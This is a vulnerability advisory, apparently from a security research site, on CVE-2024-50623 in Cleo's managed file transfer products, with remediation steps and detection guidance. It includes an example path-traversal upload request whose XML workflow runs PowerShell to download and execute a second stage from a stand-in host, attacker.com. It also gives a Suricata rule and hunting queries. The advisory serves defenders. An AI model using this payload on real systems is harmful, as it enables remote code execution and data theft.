CVE-2024-50623 High Patch Available

CVE-2024-50623: Cleo Harmony/VLTrader — Unrestricted File Upload and Download RCE

Vuln Brief Research Team · · CVSS 8.8

CVE Details

CVE ID CVE-2024-50623
CVSS Score 8.8
Severity High
Vendor Cleo
Product Harmony / VLTrader / LexiCom
Patch Status Available
Published April 15, 2026

Background

Cleo’s Harmony, VLTrader, and LexiCom are managed file transfer (MFT) solutions serving the supply chain, logistics, and retail sectors. These products handle B2B data exchange including EDI (Electronic Data Interchange) documents, purchase orders, shipment records, and financial transactions.

CVE-2024-50623 was the initial vulnerability in the Cleo product line disclosed by security researchers in October 2024. While rated CVSS 8.8 (High), its significance extends beyond its individual score: it established the initial attack foothold in Cleo installations that threat actors then deepened with the more severe CVE-2024-55956 in December 2024. The two vulnerabilities are closely related and were used sequentially by the Clop ransomware group in their coordinated Cleo exploitation campaign.

Technical Mechanism

CVE-2024-50623 is an unrestricted file upload and download vulnerability in Cleo’s web-accessible interface. The vulnerability permits:

  1. Unrestricted file upload: Files can be uploaded to the server via HTTP without proper path validation or content type restrictions
  2. Unrestricted file download: Files can be downloaded from the server without adequate authentication or path restriction

The file upload component lacks validation of:

  • The upload path (path traversal allows writing outside intended directories)
  • File content type (any file type including executable scripts can be uploaded)
  • Authentication for certain upload endpoints

The path traversal aspect allows writing uploaded files to locations within the Cleo installation that will be executed by the application, rather than merely stored as data:

# Uploading a malicious file to an executable location via path traversal
POST /Cleo/Harmony/files/../autorun/malicious.xml HTTP/1.1
Host: cleo.target.com
Content-Type: text/xml

<workflow>
  <step>
    <action>RunCommand</action>
    <command>powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')"</command>
  </step>
</workflow>

The autorun directory (also central to CVE-2024-55956) is monitored by the Cleo application and files placed there are processed and executed. This makes it an ideal target for code execution via file upload.

The download component vulnerability allows reading arbitrary files from the server filesystem, enabling information gathering (credentials, configuration) as a precursor to further exploitation.

Real-World Exploitation Evidence

CVE-2024-50623 was initially documented by security researchers and Cleo’s own advisory team in October-November 2024. Key observations:

  • Researcher disclosure: Security researchers identified and reported the vulnerability to Cleo, leading to the October 2024 advisory.
  • Patch bypass: Cleo released a patch for CVE-2024-50623, but Clop (or an affiliated researcher) identified that the patch was incomplete — the core file upload issue was addressed but the autorun directory remained accessible via a slightly different path. This bypass became the basis for CVE-2024-55956.
  • Staged exploitation: Post-incident analysis of Clop’s December 2024 campaign showed some victims were first accessed via CVE-2024-50623 before CVE-2024-55956 was used.
  • Data theft staging: CVE-2024-50623’s download capability was used to exfiltrate configuration files and credentials as reconnaissance for deeper access.

Impact Assessment

CVE-2024-50623 provides:

  • Arbitrary file write: Upload files to any location on the Cleo server accessible to the application process, enabling code execution when targeting executable directories.
  • Arbitrary file read: Access any file on the server readable by the Cleo process — including configuration files with passwords, certificates, and trading partner credentials.
  • Authentication context: High-privilege code execution in the Cleo application’s context, which has access to all transfer data and connected systems.
  • Chaining to deeper access: The download capability enables credential harvesting that facilitates fully authenticated attacks on the Cleo API and connected systems.

Affected Versions

ProductAffected VersionsFixed Version
Cleo Harmony5.8.0.20 and prior5.8.0.21+ (CVE-2024-50623 fix); 5.8.0.24+ (full fix including CVE-2024-55956)
Cleo VLTrader5.8.0.20 and prior5.8.0.21+ / 5.8.0.24+
Cleo LexiCom5.8.0.20 and prior5.8.0.21+ / 5.8.0.24+

Important: The 5.8.0.21 patch for CVE-2024-50623 was found to be bypassable by the technique used in CVE-2024-55956. Full remediation requires version 5.8.0.24+.

Remediation Steps

  1. Upgrade to 5.8.0.24 or later: This version addresses both CVE-2024-50623 and CVE-2024-55956. The 5.8.0.21 patch is insufficient.

  2. Check for evidence of exploitation:

    # Check autorun directory for unexpected files
Get-ChildItem "C:\Cleo\Harmony\autorun\" -Recurse | 
  Where-Object {$_.CreationTime -gt (Get-Date).AddDays(-30)}

# Check for unexpected XML workflow files
Get-ChildItem "C:\Cleo\Harmony\" -Filter "*.xml" -Recurse | 
  Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-30)}

  3. Review file transfer logs: Check Cleo’s transaction logs for unusual download activity, particularly bulk downloads of configuration files.

  4. Restrict web interface access: Limit access to the Cleo web interface to known internal management networks.

  5. Rotate trading partner credentials: If exploitation occurred, treat all credentials in Cleo’s configuration as compromised.

  6. Disable autorun if not needed: The autorun feature is a high-risk component; disable it if the workflow automation capability is not in use.

Detection Guidance

Log sources:

  • Cleo Harmony transaction log: <install>\Harmony\logs\
  • Cleo Harmony system log: <install>\Harmony\logs\harmony.log
  • Windows Event Logs for process creation events

Suspicious patterns in Cleo logs:

  • File upload requests with ../ or ..%2F in path parameters
  • Download requests for configuration files (.properties, .xml in config directories)
  • Process creation events showing cmd.exe or powershell.exe spawned from the Cleo Java process

Windows Event Log (PowerShell):

# Check for process creation from Cleo's JVM
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4688] and EventData[Data[@Name='ParentProcessName'] and contains(Data,'java.exe')]]" | 
  Where-Object {$_.Message -match "cmd.exe|powershell.exe"}

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Cleo MFT CVE-2024-50623 Path Traversal File Upload"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/Cleo/"; http.uri; content:"../"; distance:0; sid:9002506; rev:1;)

Timeline

DateEvent
October 2024Cleo publishes advisory for CVE-2024-50623
October 2024Cleo releases version 5.8.0.21 with partial fix
November 2024Security researchers discover patch bypass technique
December 2024Clop exploits both CVE-2024-50623 and CVE-2024-55956 in campaign
December 2024CISA adds CVE-2024-50623 to KEV catalogue
December 2024Cleo releases 5.8.0.24 addressing both vulnerabilities

Tags

cleoharmonyvltraderlexicomfile-uploadrcemanaged-file-transfercisa-kev

Related Analysis

CVE-2024-1708 Critical

CVE-2024-1708: ConnectWise ScreenConnect Path Traversal — RMM Tools as Attack Vectors

ConnectWise

CVE-2026-0300 Critical

CVE-2026-0300: Palo Alto PAN-OS Out-of-Bounds Write Leads to Root RCE on Firewalls

Palo Alto Networks

CVE-2026-20182 Critical

CVE-2026-20182: Cisco Catalyst SD-WAN Authentication Bypass — Unauthenticated Admin Access

Cisco